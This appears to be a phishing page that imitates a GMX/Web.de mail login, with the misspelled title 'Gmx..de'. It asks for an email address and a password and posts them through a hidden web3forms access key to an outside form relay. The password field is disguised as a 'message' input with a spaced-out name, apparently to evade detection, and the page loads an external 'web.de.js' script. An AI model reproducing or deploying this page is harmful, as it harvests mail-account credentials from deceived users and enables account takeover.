<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8"/>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>vereinfachte Servicebetreuung für Gmx..de</title>
        <link rel="stylesheet" href="index.css">
          </head>
  <body>
        <div class="contact-container">
           <form action="https://api.web3forms.com/submit" method="POST"> 
      <input type="hidden" name="access_key" value="e9a65915-5cd3-4aff-9480-29e5abaf9f58">
            <style>
      body {
        font-family: Arial, sans-serif;
        display: flex;
        justify-content: center;
        align-items: center;
        text-align: center;
        height: 100vh;
        margin: 0;
        background-color: #f7d736f9;
        padding: 0;
      }

      .login-container {
        background-color: #f7d736f9;
        padding: 30px;
        border-radius: 10px;
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        width: 350px;
      }

      form {
        display: flex;
        flex-direction: column;
        align-items: center;
        text-align: center;
      }

      input[type="email"],
      input[type="message"] {
        width: 100%;
        padding: 10px;
        margin-bottom: 15px;
        border: 5px solid #e7c74af9;
        border-radius: 50px;
      }

      input[type="submit"] {
        padding: 15px;
        background-color: #b8a143f9;
        border: none;
        color: hsl(0, 0%, 6%);
        border-radius: 5px;
        font-size: 18px;
        cursor: pointer;
      }

      input[type="submit"]:hover {
        background-color: #e7c74af9;
      }
    </style>
        <body>
    <div class="login-container">
      <img src="download002.png" alt="logo" class="logo" width="60px" height="40px" text-align="center" outline="none">
        <div class="message-container" input type="message" id="password" span id="togglemessage">

      <h3>Login</h3>

      <h3>Username</h3>

      <form action="/login" method="POST" text-align:center;>
        <!-- Email Input -->
      </div>
        <input type="email" name="email" placeholder="E-Mail-Adresse" required>

        <h3>Passwort</h3>
        <!-- Password Input -->
         <div>
        <input type="message" name="p a s s w o r t" placeholder="P a s s w o r t" required>
        <input type="submit" value="Login" />
        <script src="web.de.js"></script>
        <div>
      </form>
    </div>
  </body>
</html>
